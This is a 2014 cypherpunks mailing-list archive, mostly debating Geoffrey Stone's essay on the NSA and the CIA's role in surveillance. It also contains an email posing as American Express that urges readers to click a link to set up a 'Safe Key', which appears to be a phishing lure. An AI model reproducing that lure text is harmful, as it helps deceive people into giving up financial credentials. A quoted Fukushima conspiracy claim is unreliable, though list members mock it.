The NSA should be subject to constant > and rigorous review, oversight, scrutiny, and checks and > balances. The work it does, however important to the safety > of the nation, necessarily poses grave dangers to fundamental > American values, particularly if its work is abused by persons > in positions of authority. If anything, oversight of the NSA > -- especially by Congress -- should be strengthened. The future > of our nation depends not only on the NSA doing its job, but > also on the existence of clear, definitive, and carefully > enforced rules and restrictions governing its activities. > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. > > From cypher at cpunk.us Thu Apr 3 00:27:59 2014 From: cypher at cpunk.us (Cypher) Date: Thu, 3 Apr 2014 02:27:59 -0500 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: <9198C9B9-12CB-4CE7-9A28-4BA24DFE91C6@cpunk.us> On Apr 2, 2014, at 21:56, dan at geer.org wrote: > > [ disclaimer, Geoff Stone is a friend of mine ] > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. This just smacks of an apologetics piece; maybe even something the NSA themselves might write. Nobody but the most willfully delusional apologist could possibly look at the history of this agency, especially but not limited to the last year, and believe that the NSA is an agency with "good intentions". Self-serving, corporate and political protectionists, yes. Good intentions, nobody really believes that. Lastly, isn't it a little (or a lot) arrogant to believe that an agency that's fooled Congress and the President, lied to the American people, and undermined the security of worldwide communications, couldn't fool you too? 
What did he think? That they would simply open up and fess up to their abuse because they respect who he is? Thank you, Ft. Meade for the latest comedy show. Cypher From jya at pipeline.com Thu Apr 3 03:42:29 2014 From: jya at pipeline.com (John Young) Date: Thu, 03 Apr 2014 06:42:29 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: Stone's is a good statement which correctly places responsibility on three-branch policy and oversight of NSA, a military unit obliged to obey command of civilians however bizarre and politically self-serving. ODNI and NSA have been inviting a series of critics and journalists to discussions. Most have resulted in statements similar to Stone's. No such discussions were held after 9/11. Incorrect to compare NSA to rogue, dirty work, civilian-led CIA which will attack the three branches if riled. That is the blackmail looming since 1947. Greater public oversight of the three-branches is needed, for they are the rogue, dirty work, civilian-led three LS, protected by highest secrecy. If this can be helped by these invited discussions and statements, that would be a true advance beyond mere futile debate so far generated by shallow journalistic reporting and polemics. Release of far more of Snowden's documents will be needed for this to happen, hopefully the whole wad by a means that will put the technology in the hands of those who can understand it. So far, the journalists have released only the most useful to arouse indignation and refuse to release what could make a lasting difference. Not that journalists should be expected to make a lasting difference.
At 10:56 PM 4/2/2014, you wrote: >[ disclaimer, Geoff Stone is a friend of mine ] > > >www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology > >What I Told the NSA > > Because of my service on the President's Review Group last fall, > which made recommendations to the president about NSA surveillance > and related issues, the NSA invited me to speak today to the NSA > staff at the NSA headquarters in Fort Meade, Maryland, about my > work on the Review Group and my perceptions of the NSA. Here, > in brief, is what I told them: > > From the outset, I approached my responsibilities as a member > of the Review Group with great skepticism about the NSA. I am > a long-time civil libertarian, a member of the National Advisory > Council of the ACLU, and a former Chair of the Board of the > American Constitution Society. To say I was skeptical about > the NSA is, in truth, an understatement. > > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. > > Like any organization dealing with extremely complex issues, > the NSA on occasion made mistakes in the implementation of its > authorities, but it invariably reported those mistakes upon > discovering them and worked conscientiously to correct its > errors. The Review Group found no evidence that the NSA had > knowingly or intentionally engaged in unlawful or unauthorized > activity. To the contrary, it has put in place carefully-crafted > internal procedures to ensure that it operates within the bounds > of its lawful authority. > > This is not to say that the NSA should have had all of the > authorities it was given.
The Review Group found that many of > the programs undertaken by the NSA were highly problematic and > much in need of reform. But the responsibility for directing > the NSA to carry out those programs rests not with the NSA, > but with the Executive Branch, the Congress, and the Foreign > Intelligence Surveillance Court, which authorized those programs > -- sometimes without sufficient attention to the dangers they > posed to privacy and civil liberties. The NSA did its job -- > it implemented the authorities it was given. > > It gradually became apparent to me that in the months after > Edward Snowden began releasing information about the government's > foreign intelligence surveillance activities, the NSA was being > severely -- and unfairly -- demonized by its critics. Rather > than being a rogue agency that was running amok in disregard > of the Constitution and laws of the United States, the NSA was > doing its job. It pained me to realize that the hard-working, > dedicated, patriotic employees of the NSA, who were often > working for far less pay than they could have earned in the > private sector because they were determined to help protect > their nation from attack, were being castigated in the press > for the serious mistakes made, not by them, but by Presidents, > the Congress, and the courts. > > Of course, "I was only following orders" is not always an > excuse. But in no instance was the NSA implementing a program > that was so clearly illegal or unconstitutional that it would > have been justified in refusing to perform the functions > assigned to it by Congress, the President, and the Judiciary. > Although the Review Group found that many of those programs > need serious re-examination and reform, none of them was so > clearly unlawful that it would have been appropriate for the > NSA to refuse to fulfill its responsibilities. 
> > Moreover, to the NSA's credit, it was always willing to engage > the Review Group in serious and candid discussions about the > merits of its programs, their deficiencies, and the ways in > which those programs could be improved. Unlike some other > entities in the intelligence community and in Congress, the > leaders of the NSA were not reflexively defensive, but were > forthright, engaged, and open to often sharp questions about > the nature and implementation of its programs. > > To be clear, I am not saying that citizens should trust the > NSA. They should not. Distrust is essential to effective > democratic governance. The NSA should be subject to constant > and rigorous review, oversight, scrutiny, and checks and > balances. The work it does, however important to the safety > of the nation, necessarily poses grave dangers to fundamental > American values, particularly if its work is abused by persons > in positions of authority. If anything, oversight of the NSA > -- especially by Congress -- should be strengthened. The future > of our nation depends not only on the NSA doing its job, but > also on the existence of clear, definitive, and carefully > enforced rules and restrictions governing its activities. > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. From AmericanExpress at welcome.aexp.com Thu Apr 3 00:26:34 2014 From: AmericanExpress at welcome.aexp.com (American Express Customer Service) Date: 3 Apr 2014 07:26:34 GMT Subject: American Express - Safe Key Message-ID: A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 7446 bytes Desc: not available URL: From jya at pipeline.com Thu Apr 3 05:09:50 2014 From: jya at pipeline.com (John Young) Date: Thu, 03 Apr 2014 08:09:50 -0400 Subject: Geoff Stone, Obama's Review Group - Part 2 In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: The CIA is the principal customer of NSA products outside the military. When global cyber spying Cybercom was proposed NSA did not want to do it, claiming it exceeded NSA's military mission. However, the pols, and CIA, wanted that very excess, in particular for spying inside the US, ostensibly banned for the CIA but now needed for terrorists inside. CIA (long FBI opponents) thought FBI could not cope with inside terrorists, using 9/11 as an example, and advocated NSA involvement with its much greater technical capability, but more importantly, its military-privileged secrecy not susceptible to full congressional oversight, courts and FOIA. The joint CIA-NSA Special Collection Service (SCS) has been doing for decades what NSA is now alone accused of doing: CIA provided the targets, NSA did the technical collection from those global stations identified by xKeyscore (most in embassies or nearby). What is bizarre is how little CIA is mentioned in news furor about NSA, as if NSA did its work in isolation from the IC and without oversight of the 3 branches. SCS also does burglaries, code snatches, decrypts, doc drops, stings, ploys, blackmail, the panoply of CIA operations. The increased civilian target panoply bestowed upon NSA came from CIA demands channeled through ODNI. Reviewing what little has been released of the Snowden documents they are quite similar to what SCS has been doing with the addition of the US as target. FISA had to be rejiggered for the US domain. Most national leaders, like POTUS, are considered to be military commanders thus fair game for NSA along with CIA. 
Nothing exceptional about the recent revelations of spying on chiefs of state. NSA technical collection capability was developed for the military, not civilian use. Now expanded to CIA full dominance territory. FISA had to be rejiggered for using it against civilians. And is still being rejiggered these days. NSA's recent attempt to slough off Cybercom and return to its military mission, has been rejected by the civilian overseers following CIA guidance and fear-mongering of civilians, especially those inside the US. The last thing CIA and its supporters want is a revelation of its manipulation of civilian leaders institutionalized by the 1947 National Security Act (also opposed by the military). ----- At 10:56 PM 4/2/2014, DG wrote on cypherpunks: >[ disclaimer, Geoff Stone is a friend of mine ] > > >www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology > >What I Told the NSA > > Because of my service on the President's Review Group last fall, > which made recommendations to the president about NSA surveillance > and related issues, the NSA invited me to speak today to the NSA > staff at the NSA headquarters in Fort Meade, Maryland, about my > work on the Review Group and my perceptions of the NSA. Here, > in brief, is what I told them: > > From the outset, I approached my responsibilities as a member > of the Review Group with great skepticism about the NSA. I am > a long-time civil libertarian, a member of the National Advisory > Council of the ACLU, and a former Chair of the Board of the > American Constitution Society. To say I was skeptical about > the NSA is, in truth, an understatement. > > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. 
Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. > > Like any organization dealing with extremely complex issues, > the NSA on occasion made mistakes in the implementation of its > authorities, but it invariably reported those mistakes upon > discovering them and worked conscientiously to correct its > errors. The Review Group found no evidence that the NSA had > knowingly or intentionally engaged in unlawful or unauthorized > activity. To the contrary, it has put in place carefully-crafted > internal procedures to ensure that it operates within the bounds > of its lawful authority. > > This is not to say that the NSA should have had all of the > authorities it was given. The Review Group found that many of > the programs undertaken by the NSA were highly problematic and > much in need of reform. But the responsibility for directing > the NSA to carry out those programs rests not with the NSA, > but with the Executive Branch, the Congress, and the Foreign > Intelligence Surveillance Court, which authorized those programs > -- sometimes without sufficient attention to the dangers they > posed to privacy and civil liberties. The NSA did its job -- > it implemented the authorities it was given. > > It gradually became apparent to me that in the months after > Edward Snowden began releasing information about the government's > foreign intelligence surveillance activities, the NSA was being > severely -- and unfairly -- demonized by its critics. Rather > than being a rogue agency that was running amok in disregard > of the Constitution and laws of the United States, the NSA was > doing its job.
It pained me to realize that the hard-working, > dedicated, patriotic employees of the NSA, who were often > working for far less pay than they could have earned in the > private sector because they were determined to help protect > their nation from attack, were being castigated in the press > for the serious mistakes made, not by them, but by Presidents, > the Congress, and the courts. > > Of course, "I was only following orders" is not always an > excuse. But in no instance was the NSA implementing a program > that was so clearly illegal or unconstitutional that it would > have been justified in refusing to perform the functions > assigned to it by Congress, the President, and the Judiciary. > Although the Review Group found that many of those programs > need serious re-examination and reform, none of them was so > clearly unlawful that it would have been appropriate for the > NSA to refuse to fulfill its responsibilities. > > Moreover, to the NSA's credit, it was always willing to engage > the Review Group in serious and candid discussions about the > merits of its programs, their deficiencies, and the ways in > which those programs could be improved. Unlike some other > entities in the intelligence community and in Congress, the > leaders of the NSA were not reflexively defensive, but were > forthright, engaged, and open to often sharp questions about > the nature and implementation of its programs. > > To be clear, I am not saying that citizens should trust the > NSA. They should not. Distrust is essential to effective > democratic governance. The NSA should be subject to constant > and rigorous review, oversight, scrutiny, and checks and > balances. The work it does, however important to the safety > of the nation, necessarily poses grave dangers to fundamental > American values, particularly if its work is abused by persons > in positions of authority. If anything, oversight of the NSA > -- especially by Congress -- should be strengthened. 
The future > of our nation depends not only on the NSA doing its job, but > also on the existence of clear, definitive, and carefully > enforced rules and restrictions governing its activities. > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. From jamesdbell9 at yahoo.com Thu Apr 3 08:53:06 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Thu, 3 Apr 2014 08:53:06 -0700 (PDT) Subject: Investigating the Investigators In-Reply-To: <2599717.Sq0aVNU7Id@lap> References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> <2599717.Sq0aVNU7Id@lap> Message-ID: <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com> From: rysiek To: cypherpunks at cpunks.org Sent: Thursday, April 3, 2014 2:39 AM Subject: Re: Investigating the Investigators On Tuesday, 1 April 2014 22:16:38, jim bell wrote: > On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote: > > Group of people who burgled the FBI in 1971 > > https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reve > > al-themselves-in--1971-205728154.html?vp=1> > >Thanks for posting this. It's so timely and historically important. > >Can't wait to see it. > > > >Hey Jim, what happened with the Yahoo account you were locked out of? > >Did you ever get the lost emails and contacts restored? > >-Shelley > > Haven't got back on jamesdbell8 at yahoo.com. I'm convinced that Yahoo is a > bunch of crooks. Bleeding-heart, do-gooder liberal crooks. Anybody who > looks at Yahoo's news sees this. Jim Bell >And yet you use jamesbell9 at yahoo.com. >I'm sure there are lots of places that would be very happy to host your e- >mail. Yes, you are absolutely quite correct. Mea culpa, and all that, a hundred times over.
About all I can say at the moment is that I am very busy, have a lot to do (mostly concerning my isotope-modified optical-fiber invention), and I hesitate to begin the mental machinations of changing over my email system at the moment. Presumably videos describing such changes are available on YouTube, and I will have to look for, and watch, them soon. Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2697 bytes Desc: not available URL: From softservant at gmail.com Thu Apr 3 06:45:37 2014 From: softservant at gmail.com (Softy) Date: Thu, 3 Apr 2014 09:45:37 -0400 Subject: Geoff Stone, Obama's Review Group Message-ID: > Have to say it seems more plausible to me that they did a faux-forthright > job of answering questions from this new review process. I mean what else > could they do? Stonewall? > > Adam > > I'll suggest a slightly different scenario. One in which Stone is presenting his honest opinion, and in which what he spoke is accurate. I don't know much about him - I think I'm fairly safe in stating prior to his Review panel he never went close to, let alone through, the Ft. Meade perimeter onto NSA grounds. Doing so is awe inspiring. Not just with heady notions of which agency, and its history, runs the building; but also seeing the scale of the operations. It's a visceral reminder of the power of the United States - both of its good and bad aspects. So, I suggest Mr. Stone was overwhelmed and genuinely convinced of what he saw: he wanted to see a behemoth of an organization full of sun-glassed covert agents running amok. Rather he saw slightly shabbily dressed day workers interspersed with the occasional suit, all surrounded by uniformed members of the five military branches as well as those of five other countries.
Second, I suggest the NSA ( and any other semi-/fully- covert agency ) can easily "expose" all of its bookkeeping for review without exposing anything it doesn't want exposed. They don't need to be secretive - the nature of the organization is so silo'd, looking in from any combination of directions would never give any indication of a compartment unless one knew where and how to request that compartment by name. The result is the Review panel feels they came away with a complete understanding of the Agency, and the individuals came away with a new understanding of what Power means, and how it is applied into the world. Some of that understanding is valid - some isn't. Lastly, I think taking Mr. Stone's words as only about the NSA is a mistake. He was writing to, and about, the Agency employees. Namely, suggesting to them they might do better in the future to continually re-evaluate their bosses; rather than assuming "father knows best." And this is the best possible oversight - the tens of thousands of employees are as American as anyone, they have it in their own best interest not to tolerate abuses by their bosses. Sadly that type of oversight is insufficient, but that mindset within the majority of employees is crucial and what I think Mr. Stone was trying to enrich. go easy, -daniel -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4689 bytes Desc: not available URL: From guido at witmond.nl Thu Apr 3 00:49:45 2014 From: guido at witmond.nl (Guido Witmond) Date: Thu, 03 Apr 2014 09:49:45 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533CEA12.4020904@riseup.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> <533CEA12.4020904@riseup.net> Message-ID: <533D1299.9@witmond.nl> On 04/03/14 06:56, Douglas Lucas wrote: >>From the looks of this speech, the NSA must have blackmailed him. > There are some who think this is quite clever.
Quoted from a comment by user 'decrement' on techdirt [1]: There is a bit of genius behind Geoffrey Stone's approach. It is far too easy when being blasted by public and press opinion to simply circle the wagons and ignore the criticism. To simply resist the opposing viewpoint. To trivialize it. What is the ideal result one can hope for going forward? In my opinion that result looks like opening doors to tighten privacy laws and ending some of these unfettered metadata collection activities. By reinforcing to the employees at the NSA that they are doing a good job, and protecting the country, then placing blame outside the NSA George defuses the personal nature of the argument. This allows employees to be more receptive to the message, and plants the seed that accepting change is not equated with a defeat. In terms of realizing a true significant modification of these programs, planting this seed is a brilliant move. Continuing to water it may grow additional support for these ideas from within. Splitting hairs by demonizing the entire organization, as reprehensible as past actions might be, is a certain way to maximize resistance. I like the focus on "what is the desired outcome?" rather than reactionary outrage. end quote. Guido. 1: http://www.techdirt.com/articles/20140401/17575126774/member-intelligence-review-group-tells-nsa-you-guys-have-done-amazing-work-protecting-america-should-never-ever-be-trusted.shtml -------------- next part -------------- A non-text attachment was scrubbed...
Name: signature.asc Type: application/pgp-signature Size: 897 bytes Desc: OpenPGP digital signature URL: From cathalgarvey at cathalgarvey.me Thu Apr 3 02:07:28 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Thu, 03 Apr 2014 10:07:28 +0100 Subject: Google can grow up to not be evil In-Reply-To: <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> Message-ID: <533D24D0.5080308@cathalgarvey.me> Keep reading: "Fukushima is the result of, we believe, a nuke that blew up the reactor and another that set off the tsunami - the result of a war WITHIN the CIA. We believe many public 'leaders' are involved." ..I don't even On 02/04/14 20:59, tpb-crypto at laposte.net wrote: >> Message of 02/04/14 19:13 >> From: "beam" >> To: cypherpunks at al-qaeda.net, cypherpunks at cpunks.org, "cryptopolitics" >> Cc: >> Subject: Google can grow up to not be evil >> > >> "By working together with those that harvest value from nature, Google >> can quickly create a truly non-evil system for all. >> >> We suggest that the "there is one way and that way is secure, >> economically-viable-and-self-extending, anonymous and untraceable" is >> the policy to adopt, in that order. >> >> We are happy to amplify this." >> >> Source: http://courtofrecord.co.uk/US/US-Google-cover/ >> >> >>> >> [ signature.asc (0.3 KB) ] > > "We suggest that Google engineers embrace and adopt the lisp programming language to create a brand new open source operating system with a lisp kernel." > > I lost. > -- T: @onetruecathal, @IndieBBDNA P: +353876363185 W: http://indiebiotech.com -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x988B9099.asc Type: application/pgp-keys Size: 6176 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed...
Name: signature.asc Type: application/pgp-signature Size: 901 bytes Desc: OpenPGP digital signature URL: From demonfighter at gmail.com Thu Apr 3 08:19:44 2014 From: demonfighter at gmail.com (Steve Furlong) Date: Thu, 3 Apr 2014 11:19:44 -0400 Subject: Google can grow up to not be evil In-Reply-To: References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> <533D24D0.5080308@cathalgarvey.me> <6578247.InOOgvZAbe@lap> Message-ID: On Thu, Apr 3, 2014 at 10:58 AM, Lodewijk andré de la porte wrote: > Terribly weak nuke to leave the reactor /just/ intact enough to make it SEEM like an earthquake + tsunami, while IN FACT it WAS a nuke! You've been taken in by the lies of the lying liars. NOAA controls an earthquake machine which can cause flooding. (The flooding capability is why NOAA won the inter-departmental wars to control the device, by the way.) The CIA got word that the Japanese were creating impossibly strong alloys in the Fukushima reactors, for use in their new line of combat robots, code-named Terminator. Careful, but speedy, planning by various US agencies determined that use of the earthquake machine was the least destructive way to disrupt the Terminator program. It had the added benefit of reducing the electric power available for the Japanese AI development effort, code-named Skynet. -- Neca eos omnes. Deus suos agnoscet. -- Arnaud-Amaury, 1209 -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 1192 bytes Desc: not available URL: From rysiek at hackerspace.pl Thu Apr 3 02:36:08 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 03 Apr 2014 11:36:08 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533CEA12.4020904@riseup.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> <533CEA12.4020904@riseup.net> Message-ID: <1510450.mnmU7lygH4@lap> On Wednesday, 2 April 2014 23:56:50, Douglas Lucas wrote: > From the looks of this speech, the NSA must have blackmailed him. Indeed. Regardless, however, some part of this diagnosis is spot-on: NSA should *not* have these authorities in the first place. I'm fine with Executive, Congress, FISA getting flak for these. And I'm quite certain that NSA has no way of white-washing themselves now. -- Regards, rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Thu Apr 3 02:39:28 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 03 Apr 2014 11:39:28 +0200 Subject: Investigating the Investigators In-Reply-To: <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> Message-ID: <2599717.Sq0aVNU7Id@lap> On Tuesday, 1 April 2014 22:16:38, jim bell wrote: > On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote: > > Group of people who burgled the FBI in 1971 > > https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reve > > al-themselves-in--1971-205728154.html?vp=1> > >Thanks for posting this. It's so timely and historically important. > >Can't wait to see it. > > > >Hey Jim, what happened with the Yahoo account you were locked out of?
> >Did you ever get the lost emails and contacts restored? > >-Shelley > > Haven't got back on jamesdbell8 at yahoo.com. I'm convinced that Yahoo is a > bunch of crooks. Bleeding-heart, do-gooder liberal crooks. Anybody who > looks at Yahoo's news sees this. Jim Bell And yet you use jamesbell9 at yahoo.com. I'm sure there are lots of places that would be very happy to host your e- mail. -- Regards, rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From AmericanExpress at welcome.aexp.com Thu Apr 3 11:05:13 2014 From: AmericanExpress at welcome.aexp.com (American Express Customer Service) Date: Thu, 3 Apr 2014 13:05:13 -0500 Subject: American Express - Safe Key Message-ID: Safe Key Create your safe key now Please create your Personal Security Key. Personal Safe Key (PSK) is one of several authentication measures we utilize to ensure we are conducting business with you, and only you, when you contact us for assistance. American Express uses 128-bit Secure Sockets Layer (SSL) technology. This means that when you are on our secured website the data transferred between American Express and you is encrypted and cannot be viewed by any other party. The security of your personal information is of the utmost importance to American Express, please click here to create your PSK (Personal Safe Key). Note: You will be redirected to a secure encrypted website. The contained message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.
Sincerely, American Express Customer Service Contact Customer Service | View Our Privacy Statement | Add Us to Your Address Book This is a customer service e-mail from American Express. Using the spam/junk mail function may not block servicing messages from being sent to your email account. To learn more about e-mail security or report a suspicious e-mail, please visit us at americanexpress.com/phishing. We kindly ask you not to reply to this e-mail but instead contact us securely via customer service. American Express. All rights reserved. DTWEUSDP8138516 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7460 bytes Desc: not available URL: From carimachet at gmail.com Thu Apr 3 07:13:42 2014 From: carimachet at gmail.com (Cari Machet) Date: Thu, 3 Apr 2014 14:13:42 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: Message-ID: On Thu, Apr 3, 2014 at 1:45 PM, Softy wrote: > > Have to say it seems more plausible to me that they did a faux-forthright >> job of answering questions from this new review process. I mean what else >> could they do? Stonewall? >> >> Adam >> >> here is his argument : i bought a gun i shot someone killed them got arrested and convicted of the murder my trial in which i blamed the manufacturer of the gun for the whole ordeal was overturned after i sued the gun manufacturer and they in fact were then convicted of my murderous rampage and i was let out of jail and everything was reversed and oh yay i am a good person its just the gun manufacturer > they are bad - very bad white men and all those people in history that have been convicted of committing war crimes they didnt do it really as they were just following orders wonder what geoff would have said had he been purchased a steak dinner - doesnt matter he lets clouds enter his logic like all the other good americans do FTS > > > I'll suggest a slightly different scenario. 
> One in which Stone is presenting his honest opinion, and in which what he
> spoke is accurate.
>
> I don't know much about him - I think I'm fairly safe in stating prior to
> his Review panel he never went close to, let alone through, the Ft. Meade
> perimeter onto NSA grounds.
>
> Doing so is awe inspiring. Not just with heady notions of which agency,
> and its history, runs the building; but also seeing the scale of the
> operations. It's a visceral reminder of the power of the United States -
> both of its good and bad aspects.
>
> So, I suggest Mr. Stone was overwhelmed and genuinely convinced of what he
> saw: he wanted to see a behemoth of an organization full of sun-glassed
> covert agents running amok. Rather he saw slightly shabbily dressed day
> workers interspersed with the occasional suit, all surrounded by uniformed
> members of the five military branches as well as those of five other
> countries.
>
> Second, I suggest the NSA ( and any other semi-/fully- covert agency ) can
> easily "expose" all of its bookkeeping for review without exposing anything
> it doesn't want exposed. They don't need to be secretive - the nature of
> the organization is so silo'd, looking in from any combination of
> directions would never give any indication of a compartment unless one knew
> where and how to request that compartment by name.
>
> The result is the Review panel feels they came away with a complete
> understanding of the Agency, and the individuals came away with a new
> understanding of what Power means, and how it is applied into the world.
> Some of that understanding is valid - some isn't.
>
> Lastly, I think taking Mr. Stone's words as only about the NSA is a
> mistake. He was writing to, and about, the Agency employees. Namely,
> suggesting to them they might do better in the future to continually
> re-evaluate their bosses; rather than assuming "father knows best."
> And this is the best possible oversight - the tens of thousands of
> employees are as American as anyone, they have it in their own best
> interest not to tolerate abuses by their bosses. Sadly that type of
> oversight is insufficient, but that mindset within the majority of
> employees is crucial and what I think Mr. Stone was trying to enrich.
>
> go easy,
>
> -daniel

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

From carimachet at gmail.com Thu Apr 3 07:22:36 2014
From: carimachet at gmail.com (Cari Machet)
Date: Thu, 3 Apr 2014 14:22:36 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID:

On Thu, Apr 3, 2014 at 10:42 AM, John Young wrote:

> Not that journalists should be expected
> to make a lasting difference.

WTF?
this shit was posted on huffington post probably for those without ad blocker there was ad with bewbs on it next to the text

one more thing why do you assume to know the minds of the people that own the snowden data - they are capitalists - that is all

> At 10:56 PM 4/2/2014, you wrote:
>
>> [ disclaimer, Geoff Stone is a friend of mine ]
>>
>> www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology
>>
>> What I Told the NSA
>>
>> Because of my service on the President's Review Group last fall,
>> which made recommendations to the president about NSA surveillance
>> and related issues, the NSA invited me to speak today to the NSA
>> staff at the NSA headquarters in Fort Meade, Maryland, about my
>> work on the Review Group and my perceptions of the NSA. Here,
>> in brief, is what I told them:
>>
>> From the outset, I approached my responsibilities as a member
>> of the Review Group with great skepticism about the NSA. I am
>> a long-time civil libertarian, a member of the National Advisory
>> Council of the ACLU, and a former Chair of the Board of the
>> American Constitution Society. To say I was skeptical about
>> the NSA is, in truth, an understatement.
>>
>> I came away from my work on the Review Group with a view of
>> the NSA that I found quite surprising. Not only did I find
>> that the NSA had helped to thwart numerous terrorist plots
>> against the United States and its allies in the years since
>> 9/11, but I also found that it is an organization that operates
>> with a high degree of integrity and a deep commitment to the
>> rule of law.
>>
>> Like any organization dealing with extremely complex issues,
>> the NSA on occasion made mistakes in the implementation of its
>> authorities, but it invariably reported those mistakes upon
>> discovering them and worked conscientiously to correct its
>> errors.
>> The Review Group found no evidence that the NSA had
>> knowingly or intentionally engaged in unlawful or unauthorized
>> activity. To the contrary, it has put in place carefully-crafted
>> internal procedures to ensure that it operates within the bounds
>> of its lawful authority.
>>
>> This is not to say that the NSA should have had all of the
>> authorities it was given. The Review Group found that many of
>> the programs undertaken by the NSA were highly problematic and
>> much in need of reform. But the responsibility for directing
>> the NSA to carry out those programs rests not with the NSA,
>> but with the Executive Branch, the Congress, and the Foreign
>> Intelligence Surveillance Court, which authorized those programs
>> -- sometimes without sufficient attention to the dangers they
>> posed to privacy and civil liberties. The NSA did its job --
>> it implemented the authorities it was given.
>>
>> It gradually became apparent to me that in the months after
>> Edward Snowden began releasing information about the government's
>> foreign intelligence surveillance activities, the NSA was being
>> severely -- and unfairly -- demonized by its critics. Rather
>> than being a rogue agency that was running amok in disregard
>> of the Constitution and laws of the United States, the NSA was
>> doing its job. It pained me to realize that the hard-working,
>> dedicated, patriotic employees of the NSA, who were often
>> working for far less pay than they could have earned in the
>> private sector because they were determined to help protect
>> their nation from attack, were being castigated in the press
>> for the serious mistakes made, not by them, but by Presidents,
>> the Congress, and the courts.
>>
>> Of course, "I was only following orders" is not always an
>> excuse.
>> But in no instance was the NSA implementing a program
>> that was so clearly illegal or unconstitutional that it would
>> have been justified in refusing to perform the functions
>> assigned to it by Congress, the President, and the Judiciary.
>> Although the Review Group found that many of those programs
>> need serious re-examination and reform, none of them was so
>> clearly unlawful that it would have been appropriate for the
>> NSA to refuse to fulfill its responsibilities.
>>
>> Moreover, to the NSA's credit, it was always willing to engage
>> the Review Group in serious and candid discussions about the
>> merits of its programs, their deficiencies, and the ways in
>> which those programs could be improved. Unlike some other
>> entities in the intelligence community and in Congress, the
>> leaders of the NSA were not reflexively defensive, but were
>> forthright, engaged, and open to often sharp questions about
>> the nature and implementation of its programs.
>>
>> To be clear, I am not saying that citizens should trust the
>> NSA. They should not. Distrust is essential to effective
>> democratic governance. The NSA should be subject to constant
>> and rigorous review, oversight, scrutiny, and checks and
>> balances. The work it does, however important to the safety
